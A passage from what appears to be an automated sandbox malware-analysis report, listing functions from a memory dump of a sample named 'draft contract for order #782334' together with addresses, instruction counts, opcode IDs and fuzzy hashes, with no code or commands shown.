                                                                                                                        • Instruction Fuzzy Hash: AC418271A01609CFCB15CF69CD80A9DF7F6FF98320B1486AED666A7390D734A941CB40
                                                                                                                        Function 017102E1 Relevance: .1, Instructions: 106COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                        • Instruction ID: 62aa96b89dbe69484dc105170509e305ee5c9b1ee0bda25a8be0ec7357ff8fd9
                                                                                                                        • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                        • Instruction Fuzzy Hash: 03311631A04244AFDB228B6CCC48B9BFFE9AF15350F0445A9F855D739AD7749984CBA0
                                                                                                                        Function 017AE3DB Relevance: .1, Instructions: 105COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9ab429784023f3b9002faacc53ff25f8b9a26f145022ad0ba776648e8a3ea5d7
                                                                                                                        • Instruction ID: 1b2d66c3a37c3ef5be813fb67de47bc2cb1ddd26624899c932f7369cb302dee5
                                                                                                                        • Opcode Fuzzy Hash: 9ab429784023f3b9002faacc53ff25f8b9a26f145022ad0ba776648e8a3ea5d7
                                                                                                                        • Instruction Fuzzy Hash: 9A31C835740716ABD7229F598C44FABBAA8EB99B50F400028F600AB385DAA4DC01D7E0
                                                                                                                        Function 017B4B4B Relevance: .1, Instructions: 104COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 53c1f4845100bdfbb39f4625c03daf6740e6fc1608fa1a335f7f8b0ff42a9693
                                                                                                                        • Instruction ID: 15d6fe99b93c27b86b65dda2307fa1a52913bc63cb5a10273295b92c89f82d77
                                                                                                                        • Opcode Fuzzy Hash: 53c1f4845100bdfbb39f4625c03daf6740e6fc1608fa1a335f7f8b0ff42a9693
                                                                                                                        • Instruction Fuzzy Hash: 7E318D326052018FC721DF1DD8C4FA6B7E6FB84760F1A846EE9978B256DB30A840CB91
                                                                                                                        Function 01704260 Relevance: .1, Instructions: 102COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1f12f0e313471fe8d7f1b1a8d3f7409f144f3307dc92f55e257957a053436319
                                                                                                                        • Instruction ID: 9c22a12bbaf92b924fc3b15da8292cb5ca799940ef98b45f97dc176ffcc7d8a1
                                                                                                                        • Opcode Fuzzy Hash: 1f12f0e313471fe8d7f1b1a8d3f7409f144f3307dc92f55e257957a053436319
                                                                                                                        • Instruction Fuzzy Hash: BB41AF71204B45DFD722CF68C884B96FBE9AF49714F01886DEA5A8B290C770E804CB50
                                                                                                                        Function 017B4BB0 Relevance: .1, Instructions: 101COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4ba3081ea4424729cedfd0cdcf4c4a19c6b02430fea2487f30709ee72efb4d28
                                                                                                                        • Instruction ID: 16a9e617d3da0dec149a98bbd746ad32213e1b20ed6da8b01a9199e04b6826b5
                                                                                                                        • Opcode Fuzzy Hash: 4ba3081ea4424729cedfd0cdcf4c4a19c6b02430fea2487f30709ee72efb4d28
                                                                                                                        • Instruction Fuzzy Hash: D6317C716042019FD720DF2CC8C4BAAB7E5FB84B20F15456DF9969B296E730E904CB91
                                                                                                                        Function 0177EB1D Relevance: .1, Instructions: 100COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 769140c02bdce56aba7eb11d6a4bc9426938bda147ff80f490e3a8e9ce48332d
                                                                                                                        • Instruction ID: 4c48e416eb26355c187ec38201a1ffe81feb8e0d4476077e3c8d8704704e76b5
                                                                                                                        • Opcode Fuzzy Hash: 769140c02bdce56aba7eb11d6a4bc9426938bda147ff80f490e3a8e9ce48332d
                                                                                                                        • Instruction Fuzzy Hash: B631A1713416829BFB26576D8948F35FFD9BB41B44F2D00E0AB859B6E2DF28D881C230
                                                                                                                        Function 017C61C3 Relevance: .1, Instructions: 97COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 87bb6e637fd346f7b629b39936508c20545e8b274cdd7bc7a44229ad1fbee950
                                                                                                                        • Instruction ID: 44146c718c8deb95db2b3927b0bcf37466b59fa4c0189c077c7216e3cb3f8425
                                                                                                                        • Opcode Fuzzy Hash: 87bb6e637fd346f7b629b39936508c20545e8b274cdd7bc7a44229ad1fbee950
                                                                                                                        • Instruction Fuzzy Hash: E931AF76A0021AABDB15DF98C884BAEF7B6EB48B40F45416DF901EB244D770ED01CBA4
                                                                                                                        Function 017A483A Relevance: .1, Instructions: 96COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e04f51fc0ea8d7d0d1ed649f12980a08ab65a1e5402c96545f53aaae80eb7a1c
                                                                                                                        • Instruction ID: f49395bae8d5676f3fc0b43840aa1bf335ab63708302e7c4df67a25930b247f7
                                                                                                                        • Opcode Fuzzy Hash: e04f51fc0ea8d7d0d1ed649f12980a08ab65a1e5402c96545f53aaae80eb7a1c
                                                                                                                        • Instruction Fuzzy Hash: 3B317236A4012DABCB21DF58DC88BDEBBF9AB98310F1401A5A509A7254CB71DE918F90
                                                                                                                        Function 0172EB20 Relevance: .1, Instructions: 96COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 448414b50819365559c43ab3d535fd01d4248f901128de4604af32bac9027b9d
                                                                                                                        • Instruction ID: d4d7ebb1fa2ead38979948be5100655ded86b68d55d3b687f390b2492fbd36e4
                                                                                                                        • Opcode Fuzzy Hash: 448414b50819365559c43ab3d535fd01d4248f901128de4604af32bac9027b9d
                                                                                                                        • Instruction Fuzzy Hash: AC31D332E00225AFDB21DFA9CC80EAEFBF8EF08750F014465E956E7250D7709E418BA0
                                                                                                                        Function 017C60B8 Relevance: .1, Instructions: 95COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1ffd5bd1df5d2a194e24389769a6c1368bba992c450eba9892feb442e0b458f7
                                                                                                                        • Instruction ID: 1b17df4eff24ed7411cd9c2fdb555f880ed406014193b82af1cd10b5a8cd5550
                                                                                                                        • Opcode Fuzzy Hash: 1ffd5bd1df5d2a194e24389769a6c1368bba992c450eba9892feb442e0b458f7
                                                                                                                        • Instruction Fuzzy Hash: F231B471B40606AFDB129F99C890B7BF7B9AF84B55F11406DF506EB346DA30DD018B90
                                                                                                                        Function 017007AF Relevance: .1, Instructions: 95COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1b79470889cb7fc16d241777fc6b70a0d85abf700dd5da6c8d3df82ba13393e1
                                                                                                                        • Instruction ID: ca90f5283f783ef3bea8e046d8401ff46fb8fc850f9c4b40bf7b0c6fc9bd2e6d
                                                                                                                        • Opcode Fuzzy Hash: 1b79470889cb7fc16d241777fc6b70a0d85abf700dd5da6c8d3df82ba13393e1
                                                                                                                        • Instruction Fuzzy Hash: 0A31DC32A44712DBC713DE288884A6BFBE6BB942A0F01452DFD59A7290EA30DD1187E1
                                                                                                                        Function 01708550 Relevance: .1, Instructions: 94COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1e68c698f4245ea60afedc44f8683a58d06c15d382ce83a14cbdab9dc93a57cb
                                                                                                                        • Instruction ID: 426084456ea8a553bd682defa08a7d780596f5d57d373738ff1e92847f168431
                                                                                                                        • Opcode Fuzzy Hash: 1e68c698f4245ea60afedc44f8683a58d06c15d382ce83a14cbdab9dc93a57cb
                                                                                                                        • Instruction Fuzzy Hash: F4318C71A09302CFE761CF19C840B2AFBE9FB98700F15496EE9849B391D771E844CB92
                                                                                                                        Function 0173A6C7 Relevance: .1, Instructions: 92COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                        • Instruction ID: 556a88ca7cea968400253fc7b7cda2a07514b2d17c66015aeceff586a559a145
                                                                                                                        • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                        • Instruction Fuzzy Hash: 7F3128B2B00B01AFE765CF69DD81B57FBF8AB48A50F04092DA59AC3651E730E9008B60
                                                                                                                        Function 017AEBD0 Relevance: .1, Instructions: 91COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c6bf765d6ea8ce651062690c9417a745540e21ff73a8df44b7b272e18c7ccda1
                                                                                                                        • Instruction ID: 6dc8f38de8f68e1420e8b40b64e5f2ce8abc7bf179a3317591f9abd0b6cecf56
                                                                                                                        • Opcode Fuzzy Hash: c6bf765d6ea8ce651062690c9417a745540e21ff73a8df44b7b272e18c7ccda1
                                                                                                                        • Instruction Fuzzy Hash: BC317AB16053028FCB11DF19C58495AFBF1FFC9618F444AAEF4889B355E730A984CB92
                                                                                                                        Function 0172438F Relevance: .1, Instructions: 89COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6c16cd26ac97f7f0a7cac69e6ddbba36658de4d86435767baaa7b4b65bed09e0
                                                                                                                        • Instruction ID: 6deaf1b6a09a359d5fad051ffa2882309ae43fac01f54ba07e25ca0b50ed82f7
                                                                                                                        • Opcode Fuzzy Hash: 6c16cd26ac97f7f0a7cac69e6ddbba36658de4d86435767baaa7b4b65bed09e0
                                                                                                                        • Instruction Fuzzy Hash: E931F172B006169FD720EFA8C884A6EFBF9AF94304F008429D506D7258E730ED46CB90
                                                                                                                        Function 016FCB7E Relevance: .1, Instructions: 89COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                                        • Instruction ID: dd871babd243dd7b6ecd99f1e086ff199c29b7e5520d1668fc58186971e64131
                                                                                                                        • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                                        • Instruction Fuzzy Hash: 2D210436E4025AAADB109BB98811BAFFBB5AF14740F0581799E15E7340E6B0D90187A0
                                                                                                                        Function 016FC156 Relevance: .1, Instructions: 88COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4cce7b3cc84c40b1a1e924ed5d185b6650520270a037b2f0ec71fed10ac529ab
                                                                                                                        • Instruction ID: 703da18acaf4b05147602c68c1551375cc4c21de8a525bd8f4fbb04869444165
                                                                                                                        • Opcode Fuzzy Hash: 4cce7b3cc84c40b1a1e924ed5d185b6650520270a037b2f0ec71fed10ac529ab
                                                                                                                        • Instruction Fuzzy Hash: 2E314B715002018BD731AF6CCC44BA9F7B4EF50314F54C5ADED859B38AEAB4D982CBA0
                                                                                                                        Function 017BC3CD Relevance: .1, Instructions: 88COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                        • Instruction ID: d78ccd86c5261e1914f38b8bcfb951e459c51d5ae2b9680dcad73a80904b8ab2
                                                                                                                        • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                        • Instruction Fuzzy Hash: FC212D3A60065677CB16ABD58C44BFAFFB5EF40710F40C41AFA958B591E738DA40C360
                                                                                                                        Function 016FE420 Relevance: .1, Instructions: 88COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5988ef6bebbc2c72ea065a59a24285611388192311357313bc558426525fd15c
                                                                                                                        • Instruction ID: 90df28cedf60917f9a7ae0020c424ca71638b42fbe8c0088c588ebd38f109f47
                                                                                                                        • Opcode Fuzzy Hash: 5988ef6bebbc2c72ea065a59a24285611388192311357313bc558426525fd15c
                                                                                                                        • Instruction Fuzzy Hash: 4931F731A0152C9BDB31DF18CC45FEEBBB9EB15750F0200A9E745A72A0E775AE858F90
                                                                                                                        Function 01734588 Relevance: .1, Instructions: 87COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                        • Instruction ID: eee6649149cd97b3b7baffa0cfb13a63afa8f9ba77a75a8e6b01a331dead9b15
                                                                                                                        • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                        • Instruction Fuzzy Hash: 70218675A00609EFCB19CF58C984A8EFBB5FF88714F1080A5EE169F246D671DE05DB90
                                                                                                                        Function 017344B0 Relevance: .1, Instructions: 87COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 87473dd4e20a2cc437f601586c663c47e3974136390e09b9b6071ce06d999901
                                                                                                                        • Instruction ID: ab8e650795b6e5cb98f5c5696e0c36bb8557d7112f8f51a291e6ec1e13a28c81
                                                                                                                        • Opcode Fuzzy Hash: 87473dd4e20a2cc437f601586c663c47e3974136390e09b9b6071ce06d999901
                                                                                                                        • Instruction Fuzzy Hash: 7321B472A047459BCB26DF18C440B6BFBE4FB88760F104559F9569B685D730DA01CB91
                                                                                                                        Function 016FE388 Relevance: .1, Instructions: 86COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                        • Instruction ID: 76d8fc936c17569d2d0904bb84dcfd7dfebfd5c24946f30c55acc7cb1c29d869
                                                                                                                        • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                        • Instruction Fuzzy Hash: 74317C31600605EFD721CF68C888F6ABBB9FF45354F1145A9EA52CB2A4E770EE42CB50
                                                                                                                        Function 0177E609 Relevance: .1, Instructions: 86COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d52514f881829779e47e91ee2bcd2b110348ddd51dbbec9bd551f780636a1cba
                                                                                                                        • Instruction ID: c688e936e0651254ed1d3b10dc5d6f4b649caeae5cd3f6b214dcaa15b680b3b5
                                                                                                                        • Opcode Fuzzy Hash: d52514f881829779e47e91ee2bcd2b110348ddd51dbbec9bd551f780636a1cba
                                                                                                                        • Instruction Fuzzy Hash: B3314975A002059FCF14DF18C8889AEB7B6FF84714F158499E809DB395EB71AA50CB91
                                                                                                                        Function 017806F1 Relevance: .1, Instructions: 79COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: bab128a2ffa10cb56fbd547d9e59c91df757e50f7b1f00bec916874c085e81c8
                                                                                                                        • Instruction ID: ef25c59849eb914fec9ef44d103c9454c8e370b39175af5e3b10acaba7df8095
                                                                                                                        • Opcode Fuzzy Hash: bab128a2ffa10cb56fbd547d9e59c91df757e50f7b1f00bec916874c085e81c8
                                                                                                                        • Instruction Fuzzy Hash: CE219F76900629ABCF24EF59C881ABEF7F4FF48740B554069F941EB244D738AD42CBA1
                                                                                                                        Function 0178019F Relevance: .1, Instructions: 78COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3aafd310f22a646455816a606f852b32f12fe3c42d259e1d318741baf7450a25
                                                                                                                        • Instruction ID: 3258189bbd92b7dc82776a4435d601a20560c95c15e8d73e218aa476bd06b9d3
                                                                                                                        • Opcode Fuzzy Hash: 3aafd310f22a646455816a606f852b32f12fe3c42d259e1d318741baf7450a25
                                                                                                                        • Instruction Fuzzy Hash: A4219C71A00645AFD715EBACD844F6AF7A8FF48750F140069F944DB6A0D734ED40CBA4
                                                                                                                        Function 01780283 Relevance: .1, Instructions: 74COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0fd542f0d2d96799724c2fc26c1398dc268506b911281a529f52568d832a229d
                                                                                                                        • Instruction ID: cdad74c3dc42250308ac33c7a663784bb413b0685bf7c7bab3bd1d75db56f6cb
                                                                                                                        • Opcode Fuzzy Hash: 0fd542f0d2d96799724c2fc26c1398dc268506b911281a529f52568d832a229d
                                                                                                                        • Instruction Fuzzy Hash: 9221D0729443469FD711EF5DC848F5BFBECAFA0250F08045ABD80C7655D730C909C6A2
                                                                                                                        Function 01722835 Relevance: .1, Instructions: 73COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 74b3d671a19fa884bae749821c0cca46ab69c730c1309cecd9b0b4a4959974a1
                                                                                                                        • Instruction ID: 3678045f7fa54f2ee777412d494385d41980adbb6ae81c50cb8422bb3ac26a63
                                                                                                                        • Opcode Fuzzy Hash: 74b3d671a19fa884bae749821c0cca46ab69c730c1309cecd9b0b4a4959974a1
                                                                                                                        • Instruction Fuzzy Hash: E0210E317456919BE322676C8C08F15FBD5AF41774F2903A4FE60AF6DBD7A8D882C150
                                                                                                                        Function 0173A30B Relevance: .1, Instructions: 70COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d446a268dd6c86c92c03de0c8e5f5358fa5b24007881d501117595709db5961b
                                                                                                                        • Instruction ID: 590c1c1ed8586e374e596136331464c55877c4cee70541a24e5b9809a3d78c99
                                                                                                                        • Opcode Fuzzy Hash: d446a268dd6c86c92c03de0c8e5f5358fa5b24007881d501117595709db5961b
                                                                                                                        • Instruction Fuzzy Hash: AA21A779240B019FCB29DF29CC01B56B7F5BF48B14F2484ACA549CBB66E371E842CB94
                                                                                                                        Function 017BA49A Relevance: .1, Instructions: 70COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
